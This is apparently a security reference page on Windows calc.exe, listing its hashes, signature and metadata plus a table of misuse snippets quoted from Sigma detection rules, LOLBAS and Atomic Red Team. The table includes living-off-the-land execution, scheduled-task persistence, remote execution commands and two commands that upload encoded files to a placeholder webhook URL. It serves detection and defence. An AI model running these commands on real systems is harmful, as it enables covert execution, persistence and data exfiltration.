calc.exe
- File Path:
C:\Windows\system32\calc.exe - Description: Windows Calculator
Hashes
| Type | Hash |
|---|---|
| MD5 | 4673C27FDCAB6166578A1863060D83FF |
| SHA1 | 4A2446EE9651D90AC6C5613BDDF416DF197F6401 |
| SHA256 | B093FD472121CDA0BBB1E0079479DE36325F1B2FAA7FDA54C4F757565572FE1D |
| SHA384 | FDD4BB991CD9FB460DE2A77B1EC9142988AB256604102F04AA775C4E274B94FD0A7B467FCADB1A5A547C3BCEB8A88ED0 |
| SHA512 | D570BA4428BC5085B7CADD56A25233CAB810DCEB17D8873D4B458A4E7FA565201B45525F252489B4571ECEC24333BA216907FC849992A74572ADE03E61F00F3E |
| SSDEEP | 384:ju/51mFSDUiIMbPWUrytejUSFqpy7LJcGWSAYWSiiiiiiiiiiiiiiiiiiiiiiiik:juiQI0OUfjUUevb |
Runtime Data
Child Processes:
win32calc.exe
Signature
- Status: Signature verified.
- Serial:
33000000BCE120FDD27CC8EE930000000000BC - Thumbprint:
E85459B23C232DB3CB94C7A56D47678F58E8E51E - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: CALC.EXE
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.14393.0 (rs1_release.160715-1616)
- Product Version: 10.0.14393.0
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
File Similarity (ssdeep match)
| File | Score |
|---|---|
| C:\Windows\SysWOW64\calc.exe | 32 |
Possible Misuse
The following table contains possible examples of calc.exe being misused. While calc.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | proc_creation_win_susp_calc.yml | description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion |
DRL 1.0 |
| sigma | proc_creation_win_susp_calc.yml | CommandLine\|contains: '\calc.exe ' |
DRL 1.0 |
| sigma | proc_creation_win_susp_calc.yml | Image\|endswith: '\calc.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml | - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf |
DRL 1.0 |
| sigma | proc_creation_win_susp_system_user_anomaly.yml | - '\calc.exe' |
DRL 1.0 |
| LOLBAS | Explorer.yml | - Command: explorer.exe calc.exe |
|
| LOLBAS | Explorer.yml | Description: 'Executes calc.exe as a subprocess of explorer.exe.' |
|
| LOLBAS | Gpup.yml | - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe |
|
| LOLBAS | Nvudisp.yml | - Command: Nvudisp.exe System calc.exe |
|
| LOLBAS | Nvudisp.yml | Description: Execute calc.exe as a subprocess. |
|
| LOLBAS | Nvudisp.yml | - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" |
|
| LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe System calc.exe |
|
| LOLBAS | Nvuhda6.yml | Description: Execute calc.exe as a subprocess. |
|
| LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" |
|
| LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe KillApp calc.exe |
|
| LOLBAS | Usbinst.yml | Description: Execute calc.exe through DefaultInstall Section Directive in INF file. |
|
| LOLBAS | Bash.yml | - Command: bash.exe -c calc.exe |
|
| LOLBAS | Bash.yml | Description: Executes calc.exe from bash.exe |
|
| LOLBAS | ConfigSecurityPolicy.yml | - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile |
|
| LOLBAS | DataSvcUtil.yml | - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile |
|
| LOLBAS | Diskshadow.yml | - Command: diskshadow> exec calc.exe |
|
| LOLBAS | Explorer.yml | - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" |
|
| LOLBAS | Explorer.yml | Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe |
|
| LOLBAS | Extrac32.yml | - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe |
|
| LOLBAS | Extrac32.yml | Description: Command for copying calc.exe to another folder |
|
| LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe |
|
| LOLBAS | Forfiles.yml | Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. |
|
| LOLBAS | Ftp.yml | - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt |
|
| LOLBAS | Hh.yml | - Command: HH.exe c:\windows\system32\calc.exe |
|
| LOLBAS | Hh.yml | Description: Executes calc.exe with HTML Help. |
|
| LOLBAS | Pcalua.yml | - Command: pcalua.exe -a calc.exe |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. |
|
| LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. |
|
| LOLBAS | Scriptrunner.yml | - Command: Scriptrunner.exe -appvscript calc.exe |
|
| LOLBAS | Scriptrunner.yml | Description: Executes calc.exe |
|
| LOLBAS | Ttdinject.yml | - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" |
|
| LOLBAS | Ttdinject.yml | - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" |
|
| LOLBAS | Tttracer.yml | - Command: tttracer.exe C:\windows\system32\calc.exe |
|
| LOLBAS | Wlrmdr.yml | - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe" |
|
| LOLBAS | Wlrmdr.yml | Description: Execute calc.exe with wlrmdr.exe as parent process |
|
| LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe |
|
| LOLBAS | Advpack.yml | - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS | Pcwutl.yml | - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe |
|
| LOLBAS | Setupapi.yml | - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf |
|
| LOLBAS | Setupapi.yml | - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf |
|
| LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe |
|
| LOLBAS | Zipfldr.yml | - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe |
|
| LOLBAS | Manage-bde.yml | - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf |
|
| LOLBAS | Appvlp.yml | - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" |
|
| LOLBAS | Sqltoolsps.yml | - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe |
|
| LOLBAS | Vsjitdebugger.yml | - Command: Vsjitdebugger.exe calc.exe |
|
| LOLBAS | Vsjitdebugger.yml | Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. |
|
| LOLBAS | Wsl.yml | - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe |
|
| LOLBAS | Wsl.yml | Description: Executes calc.exe from wsl.exe |
|
| atomic-red-team | problem_report.md | e.g. The atomic test executes and calc.exe is launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1021.003.md | Upon successful execution, cmd will spawn calc.exe on a remote computer. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1021.003.md | [activator]::CreateInstance([type]::GetTypeFromProgID(“MMC20.application”,”#{computer_name}”)).Document.ActiveView.ExecuteShellCommand(“c:\windows\system32\calc.exe”, $null, $null, “7”) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1027.004.md | | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | | exe_path | path to exe to use when creating masquerading files | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | schtasks /create /tn “T1053_005_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | schtasks /create /tn “T1053_005_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | $Action = New-ScheduledTaskAction -Execute “calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1106.md | Execute program by leveraging Win32 API’s. By default, this will launch calc.exe from the command prompt. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1112.md | | new_executable | New executable to run on startup instead of Windows Defender | String | calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | | executable | name of executable | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | | executable | name of executable/file to decode | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | Upon execution, calc.exe should open | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | | payload_path | Path to payload | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | | process | Process to execute | String | calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | Upon execution calc.exe will be opened. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | $macrocode = “ Open "#{bat_path}” For Output As #1n Write #1, “calc.exe"n Close #1n a = Shell(“cmd.exe /c $bat_path ", vbNormalFocus)n” |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | and pull down the script and execute it. By default the payload will execute calc.exe on the system. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1216.md | Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1216.md | | command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.md | | powershell_code | PowerShell code to execute | String | Start-Process calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.md | Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.md | Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.001.md | Upon execution calc.exe will open | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.002.md | Upon execution calc.exe will be launched | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Upon execution calc.exe will be launched | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | | command_to_execute | Command for rundll32.exe to execute | String | calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Upon successful execution, Calc.exe will spawn. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | | target_binary | Binary To Attach To | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.013.md | Appends a start process cmdlet to the current user’s powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.013.md | | exe_path | Path the malicious executable | Path | calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | $Target = “C:\Windows\System32\calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | $ShortcutLocation = “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | Remove-Item “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” -ErrorAction Ignore | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.009.md | Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.009.md | echo URL=C:\windows\system32\calc.exe » #{shortcut_file_path} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1559.002.md | {DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” } | MIT License. © 2018 Red Canary |
| atomic-red-team | T1559.002.md | 9. DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.md | This module extracts a binary (calc.exe) from inside of another binary. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.003.md | Upon execution a hidden PowerShell window will launch calc.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.003.md | | powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1569.002.md | Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). | MIT License. © 2018 Red Canary |
| atomic-red-team | T1569.002.md | #{psexec_exe} \#{remote_host} -u #{user_name} -p #{password} -accepteula “C:\Windows\System32\calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | Upon execution, calc.exe will be opened. | MIT License. © 2018 Red Canary |
| signature-base | thor-webshells.yar | $s7 = “""%windir%\\calc.exe"")” | CC BY-NC 4.0 |
MIT License. Copyright (c) 2020-2021 Strontic.